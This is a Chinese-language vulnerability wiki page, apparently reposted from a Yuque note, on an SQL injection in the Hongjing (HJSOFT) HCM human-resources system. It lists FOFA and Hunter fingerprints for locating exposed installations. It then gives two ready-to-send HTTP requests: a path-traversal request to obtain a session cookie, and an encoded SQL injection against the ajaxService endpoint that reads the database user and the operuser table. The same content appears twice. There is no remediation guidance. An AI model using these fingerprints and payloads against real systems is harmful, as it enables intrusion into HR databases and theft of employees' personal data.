fofamini-wiki

登录白背景

源码

宏景人力资源信息管理系统ajaxService存在SQL注入漏洞

一、漏洞简介

宏景人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件，旨在帮助企事业单位构建高绩效组织，推动组织健康成长，提升组织软实力。系统功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理，以及人事、绩效、培训、招聘、考勤等业务自助，还具备报表功能和灵活的表格工具，支持集团管控、目标管理、领导决策等应用。宏景人力资源信息管理系统ajaxService存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

宏景人力资源信息管理系统

三、资产测绘

hunterapp.name="宏景 HCM"
fofaicon_hash="947874108" || body='<div class="hj-hy-all-one-logo"' || app="HJSOFT-HCM"
特征

四、漏洞复现

1、首先发送如下payload获取cookie

GET /templates/attestation/%2e%2e/%2e%2e/templates/index/getpassword.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

2、使用获取的cookie进行注入

POST /ajax/ajaxService HTTP/1.1
Host: 
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5317.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/5317.36
Cookie: JSESSIONID=8A569640D4EE7D518A536CC263DCBBB3
Content-Type: application/x-www-form-urlencoded

__type=extTrans&__xml={"functionId":"151211001137","sql":"select~20(select~20user)~20a~30~31~30~30~2c~31~20a~30~31~30~31~2c~31~20b~30~31~31~30~2c~31~20e~30~31~32~32~2c~31~20e~30~31a~31~2c~31~20dbase~2c~31~20a~30~30~30~30~20from~20operuser","nbase":"1"}

原文: https://www.yuque.com/xiaokp7/ocvun2/bhxt8fil6eo28ghy

# 宏景人力资源信息管理系统ajaxService存在SQL注入漏洞

# 一、漏洞简介
宏景人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件，旨在帮助企事业单位构建高绩效组织，推动组织健康成长，提升组织软实力。系统功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理，以及人事、绩效、培训、招聘、考勤等业务自助，还具备报表功能和灵活的表格工具，支持集团管控、目标管理、领导决策等应用。宏景人力资源信息管理系统ajaxService存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

# 二、影响版本

- 宏景人力资源信息管理系统

# 三、资产测绘

- hunter`app.name="宏景 HCM"`
- fofa`icon_hash="947874108" || body='<div class="hj-hy-all-one-logo"' || app="HJSOFT-HCM"`
- 特征

![image.png](./img/zwXDKASViNL9mxZY/1702368984886-bd83145b-caba-4fdc-9916-c5473e122d40-053754.png)

# 四、漏洞复现
1、首先发送如下payload获取cookie
```
GET /templates/attestation/%2e%2e/%2e%2e/templates/index/getpassword.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

```
![image.png](./img/zwXDKASViNL9mxZY/1715964805606-6e64f77a-1beb-4028-86c5-8bc319d378cf-154416.png)
2、使用获取的cookie进行注入
```
POST /ajax/ajaxService HTTP/1.1
Host: 
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5317.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/5317.36
Cookie: JSESSIONID=8A569640D4EE7D518A536CC263DCBBB3
Content-Type: application/x-www-form-urlencoded

__type=extTrans&__xml={"functionId":"151211001137","sql":"select~20(select~20user)~20a~30~31~30~30~2c~31~20a~30~31~30~31~2c~31~20b~30~31~31~30~2c~31~20e~30~31~32~32~2c~31~20e~30~31a~31~2c~31~20dbase~2c~31~20a~30~30~30~30~20from~20operuser","nbase":"1"}
```
![image.png](./img/zwXDKASViNL9mxZY/1715964856550-26ff9923-0caf-4193-8c4e-a3c487d180af-340029.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bhxt8fil6eo28ghy>